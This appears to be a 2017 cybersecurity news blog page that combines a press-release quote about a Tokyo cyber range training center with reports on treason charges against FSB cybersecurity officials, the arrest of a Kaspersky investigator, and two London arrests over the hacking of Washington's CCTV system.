Takeshi Mitsuishi, President and CEO of Ni Cybersecurity, said, “We selected the global leading cyber range platform, and we’re taking it to the Japanese market by opening our new training center in Tokyo, launching in Toranomon. Based on the global success of the Cyberbit Range, our customers can expect exceptional quality training, faster certification, and overall more qualified and skilled cyber security personnel.”

Sunday 5 February 2017

AFTER KASPERSKY, FSB OFFICIALS FACE TREASON CHARGES


Two of Moscow's top cybersecurity officials are facing treason charges for cooperating with the CIA. The accusations add further intrigue to a mysterious scandal that has had the Moscow rumour mill working in overdrive for the past week, and come not long after US intelligence accused Russia of interfering in the US election and hacking the Democratic party's servers.

Sergei Mikhailov was deputy head of the FSB security agency’s Centre for Information Security. His arrest was reported in a series of leaks over the past week, along with that of his deputy and several civilians.

According to earlier reports in the Russian media, Mikhailov was arrested some time ago, in theatrical fashion, during a plenary session of the top FSB leadership: a bag was placed over his head and he was marched out of the room, accused of treason.

His deputy, Dokuchayev, is believed to be a well-known Russian hacker who went by the nickname Forb, and began working for the FSB some years ago to evade jail for his hacking activities. Together with the two FSB officers, Ruslan Stoyanov, the head of the computer incidents investigations unit at cybersecurity firm Kaspersky Lab, was also arrested several weeks ago.

Kaspersky confirmed last week that Stoyanov had been arrested and was being held in a Moscow prison, though it said the arrest was not linked to his work for the company. Interfax said four people had been arrested and a further eight were potential witnesses in the case.

On Tuesday, Life, an online news portal with close links to the security services, reported that FSB agents had searched Mikhailov’s home and dacha and found more than $12m (£10m) in cash stashed in various hiding places.

Two arrested in London over hacking of US CCTV systems days before President Trump's inauguration took place


Detectives have arrested two people in London on suspicion of hacking Washington's CCTV system ahead of President Donald Trump's inauguration.
The home of a British man, aged 50, and a Swedish woman, also 50, was raided in Streatham, south London, on January 19.
It comes after storage devices which record data from police surveillance cameras in the American capital were allegedly compromised between January 12 and 15.
 
Hackers disabled 123 of 187 security cameras in Washington, prompting a major security incident.
It is believed the first cyber attack could have been a dry run, with another potentially planned during the presidential handover.
The National Crime Agency said: "Enquiries are ongoing and we are unable to provide further information at this time."
The couple have been bailed until April. Neighbours of the man and woman arrested said they keep themselves to themselves.
Police cars and officers raided the residential road at around 5.30pm. A woman who lives near the raided house, said: "My sister had just come back from work and saw a couple of police cars around 5.30pm.
"Then later more cars turned up and we could see the blue lights filling the whole house.
"They keep themselves to themselves.
"This is a quiet street and there's never any trouble round here."
Another neighbour, who did not want to be named, said: "I saw a lot of police arrive a few weeks ago.
"I don't know what it was about, but I saw them go in the house.
"I've spoken to the guy a few times, he seems really nice and we often have a chat in the street."